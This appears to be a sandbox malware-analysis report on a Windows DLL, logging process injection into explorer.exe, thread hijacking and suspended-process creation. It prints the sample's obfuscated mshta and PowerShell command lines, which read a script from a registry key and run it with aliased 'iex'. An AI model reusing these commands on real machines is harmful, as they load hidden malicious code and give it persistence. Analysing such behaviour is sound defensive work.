Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 220000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: CE0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 956000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2D60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 954000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2B50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 942000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AC0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93E000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 2BA0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93C000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: D70000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 220000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\System32\control.exe base: CE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 2BA0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 956000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2D60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 954000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2B60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2B50000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 942000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AC0000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93E000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 2BA0000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93C000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: D70000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 3360	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 3088	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 8DCB1580

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"

Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000002F.00000000.471103608.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.479070191.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.518388066.0000000000B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000002F.00000000.479497547.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000002F.00000000.492712624.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496673793.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
